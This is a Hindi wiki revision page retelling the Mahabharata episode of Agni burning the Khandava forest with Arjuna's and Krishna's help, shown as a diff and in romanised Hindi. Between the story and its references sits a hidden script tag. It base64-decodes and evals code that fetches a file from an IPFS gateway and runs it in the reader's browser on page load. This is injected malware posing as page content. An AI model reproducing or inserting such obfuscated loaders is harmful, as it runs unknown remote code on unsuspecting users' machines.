Difference between revisions of "खांडव वन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
Line 3: Line 3:
 
*गांडीव धनुष अलौकिक था। वह वरुण से अग्नि को और अग्नि से अर्जुन को प्राप्त  हुआ था। वह देव, दानव तथा गंधर्वों से अनंत वर्षों तक पूजित रहा था। वह किसी शस्त्र से नष्ट नहीं हो सकता था तथा अन्य लाख धनुषों की समता कर सकता था। उसमें धारण करने वाले के राष्ट्र को बढाने की शक्ति विद्यमान थी। उसके साथ ही अग्निदेव ने एक अक्षय तरकश भी अर्जुन को प्रदान किया था जिसके बाण कभी समाप्त नहीं हो सकते थे। गति को तीव्रता प्रदान करने के लिए जो रथ अर्जुन को मिला, उसमें आलौकिक घोड़े जुते हुए थे तथा उसके शिखर पर एक दिव्य वानर बैठा था। उस ध्वज में अन्य जानवर भी विद्यमान रहते थे जिनके गर्जन से दिल दहल जाता था। पावक ने कृष्ण को एक दिव्य चक्र प्रदान किया, जिसका मध्य भाग वज्र के समान था। वह मानवीय तथा अमानवीय प्राणियों को नष्ट कर पुनः कृष्ण के पास लौट आता था।  
 
*गांडीव धनुष अलौकिक था। वह वरुण से अग्नि को और अग्नि से अर्जुन को प्राप्त  हुआ था। वह देव, दानव तथा गंधर्वों से अनंत वर्षों तक पूजित रहा था। वह किसी शस्त्र से नष्ट नहीं हो सकता था तथा अन्य लाख धनुषों की समता कर सकता था। उसमें धारण करने वाले के राष्ट्र को बढाने की शक्ति विद्यमान थी। उसके साथ ही अग्निदेव ने एक अक्षय तरकश भी अर्जुन को प्रदान किया था जिसके बाण कभी समाप्त नहीं हो सकते थे। गति को तीव्रता प्रदान करने के लिए जो रथ अर्जुन को मिला, उसमें आलौकिक घोड़े जुते हुए थे तथा उसके शिखर पर एक दिव्य वानर बैठा था। उस ध्वज में अन्य जानवर भी विद्यमान रहते थे जिनके गर्जन से दिल दहल जाता था। पावक ने कृष्ण को एक दिव्य चक्र प्रदान किया, जिसका मध्य भाग वज्र के समान था। वह मानवीय तथा अमानवीय प्राणियों को नष्ट कर पुनः कृष्ण के पास लौट आता था।  
 
*तदनंतर अग्निदेव ने खांडव वन को सब ओर से प्रज्वलित कर दिया। जो भी प्राणी बाहर भागने की चेष्टा करता, अर्जुन तथा कृष्ण उसका पीछा करते। इस प्रकार दहित खांडव वन के प्राणी व्याकुल हो उठे। उनकी सहायता के लिए इन्द्र समस्त [[देवता|देवताओं]] के साथ घटनास्थल पर पहुचे किंतु उन सबकी भी अर्जुन तथा कृष्ण के सम्मुख एक न चली। अंततोगत्वा वे सब मैदान में भाग खड़े हुए। तभी इन्द्र के प्रति एक आकाशवाणी हुई- 'तुम्हारा मित्र तक्षक नाग [[कुरुक्षेत्र]] गया हुआ है, अतः खांडव वन दाह से बच गया है। अर्जुन तथा कृष्ण [[नर नारायण]] हैं अतः उनसे कोई देवता जीत नहीं पायेगा ।' यह सुनकर इन्द्र भी अपने लोक की ओर बढे। खांडव वन–दाह से अश्वसेन, मायासुर तथा चार शांगर्क नामक पक्षी बच गये थे। इस वन दाह से अग्नि देव तृप्त हो गये तथा उनका रोग भी नष्ट हो गया उसी समय इन्द्र मरुद्गण आदि देवताओं के साथ प्रकट हुए तथा देवताओं के लिए भी जो कार्य कठिन है, उसे करने वाले अर्जुन तथा कृष्ण को उन्होंने वर मांगने के लिए कहा। अर्जुन ने सब प्रकार के [[अस्त्र शस्त्र|दिव्यास्त्रों]] की कामना प्रकट की। इन्द्र ने कहा कि [[शिव]] को प्रसन्न कर लेने पर ही दिव्यास्त्र प्राप्त होंगे । कृष्ण ने इन्द्र से वर प्राप्त किया कि अर्जुन से उनका (कृष्ण का) प्रेम नित्य प्रति बढता जाये।<ref>महाभारत आदिपर्व,अध्याय 221 से 227 तक, अध्याय 233, श्लोक 7 से14 तक</ref>
 
*तदनंतर अग्निदेव ने खांडव वन को सब ओर से प्रज्वलित कर दिया। जो भी प्राणी बाहर भागने की चेष्टा करता, अर्जुन तथा कृष्ण उसका पीछा करते। इस प्रकार दहित खांडव वन के प्राणी व्याकुल हो उठे। उनकी सहायता के लिए इन्द्र समस्त [[देवता|देवताओं]] के साथ घटनास्थल पर पहुचे किंतु उन सबकी भी अर्जुन तथा कृष्ण के सम्मुख एक न चली। अंततोगत्वा वे सब मैदान में भाग खड़े हुए। तभी इन्द्र के प्रति एक आकाशवाणी हुई- 'तुम्हारा मित्र तक्षक नाग [[कुरुक्षेत्र]] गया हुआ है, अतः खांडव वन दाह से बच गया है। अर्जुन तथा कृष्ण [[नर नारायण]] हैं अतः उनसे कोई देवता जीत नहीं पायेगा ।' यह सुनकर इन्द्र भी अपने लोक की ओर बढे। खांडव वन–दाह से अश्वसेन, मायासुर तथा चार शांगर्क नामक पक्षी बच गये थे। इस वन दाह से अग्नि देव तृप्त हो गये तथा उनका रोग भी नष्ट हो गया उसी समय इन्द्र मरुद्गण आदि देवताओं के साथ प्रकट हुए तथा देवताओं के लिए भी जो कार्य कठिन है, उसे करने वाले अर्जुन तथा कृष्ण को उन्होंने वर मांगने के लिए कहा। अर्जुन ने सब प्रकार के [[अस्त्र शस्त्र|दिव्यास्त्रों]] की कामना प्रकट की। इन्द्र ने कहा कि [[शिव]] को प्रसन्न कर लेने पर ही दिव्यास्त्र प्राप्त होंगे । कृष्ण ने इन्द्र से वर प्राप्त किया कि अर्जुन से उनका (कृष्ण का) प्रेम नित्य प्रति बढता जाये।<ref>महाभारत आदिपर्व,अध्याय 221 से 227 तक, अध्याय 233, श्लोक 7 से14 तक</ref>
                                                                       
+
   
 +
{{प्रचार}}                                                                   
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Revision as of 10:27, 14 June 2011

  • shvaitaki ke yajn mean nirantar barah varshoan tak ghritapan karane ke upraraant agni devata ko tripti ke sath-sath apach ho gaya. unhean kisi ka havishy grahan karane ki ichchha nahian rahi. svasthy ki kamana se agnidev brahma ke pas gaye. brahma ne kaha ki yadi ve khaandav van ko jala deange to vahaan rahane vale vibhinn jantuoan se tript hone par unaki aruchi bhi samapt ho jayegi. agni ne kee bar prayatn kiya kiantu indr ne takshak nag tatha janavaroan ki raksha ke hetu agnidev ko khaandav van nahian jalane diya. agni punah brahma ke pas pahuanche. brahma se kaha ki nar aur narayan roop mean arjun tatha krishna khaandav van ke nikat baithe haian ,unase prarthana karean to agni apane manorath mean nishchit saphal hoange.
  • ek bar arjun aur krishna apani raniyoan ke sath jal-vihar ke lie gaye. agnidev ne un donoan ko akela pa brahman ke vesh mean jakar unase yathechchha bhojan ki kamana ki. unaki svikriti prapt kar agnidev ne apana parichay diya tatha bhojan ke roop mean khaandav van ki yachana ki. arjun ke yah kahane par bhi ki usake pas vegavahan karane vala koee dhanush, amit banoan se yukt tarakash tatha vegavan rath nahian hai. agnidev ne varun dev ka avahan karake gaandiv dhanush, akshay tarakash , divy gho doan se juta hua ek rath (jis par kapidhvaj lagi thi) lekar arjun ko samarpit kiya. agni ne krishna ko ek chakr samarpit kiya.
  • gaandiv dhanush alaukik tha. vah varun se agni ko aur agni se arjun ko prapt hua tha. vah dev, danav tatha gandharvoan se anant varshoan tak poojit raha tha. vah kisi shastr se nasht nahian ho sakata tha tatha any lakh dhanushoan ki samata kar sakata tha. usamean dharan karane vale ke rashtr ko badhane ki shakti vidyaman thi. usake sath hi agnidev ne ek akshay tarakash bhi arjun ko pradan kiya tha jisake ban kabhi samapt nahian ho sakate the. gati ko tivrata pradan karane ke lie jo rath arjun ko mila, usamean alaukik gho de jute hue the tatha usake shikhar par ek divy vanar baitha tha. us dhvaj mean any janavar bhi vidyaman rahate the jinake garjan se dil dahal jata tha. pavak ne krishna ko ek divy chakr pradan kiya, jisaka madhy bhag vajr ke saman tha. vah manaviy tatha amanaviy praniyoan ko nasht kar punah krishna ke pas laut ata tha.
  • tadanantar agnidev ne khaandav van ko sab or se prajvalit kar diya. jo bhi prani bahar bhagane ki cheshta karata, arjun tatha krishna usaka pichha karate. is prakar dahit khaandav van ke prani vyakul ho uthe. unaki sahayata ke lie indr samast devataoan ke sath ghatanasthal par pahuche kiantu un sabaki bhi arjun tatha krishna ke sammukh ek n chali. aantatogatva ve sab maidan mean bhag kh de hue. tabhi indr ke prati ek akashavani huee- 'tumhara mitr takshak nag kurukshetr gaya hua hai, atah khaandav van dah se bach gaya hai. arjun tatha krishna nar narayan haian atah unase koee devata jit nahian payega .' yah sunakar indr bhi apane lok ki or badhe. khaandav van–dah se ashvasen, mayasur tatha char shaangark namak pakshi bach gaye the. is van dah se agni dev tript ho gaye tatha unaka rog bhi nasht ho gaya usi samay indr marudgan adi devataoan ke sath prakat hue tatha devataoan ke lie bhi jo kary kathin hai, use karane vale arjun tatha krishna ko unhoanne var maangane ke lie kaha. arjun ne sab prakar ke divyastroan ki kamana prakat ki. indr ne kaha ki shiv ko prasann kar lene par hi divyastr prapt hoange . krishna ne indr se var prapt kiya ki arjun se unaka (krishna ka) prem nity prati badhata jaye.[1]


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. mahabharat adiparv,adhyay 221 se 227 tak, adhyay 233, shlok 7 se14 tak

sanbandhit lekh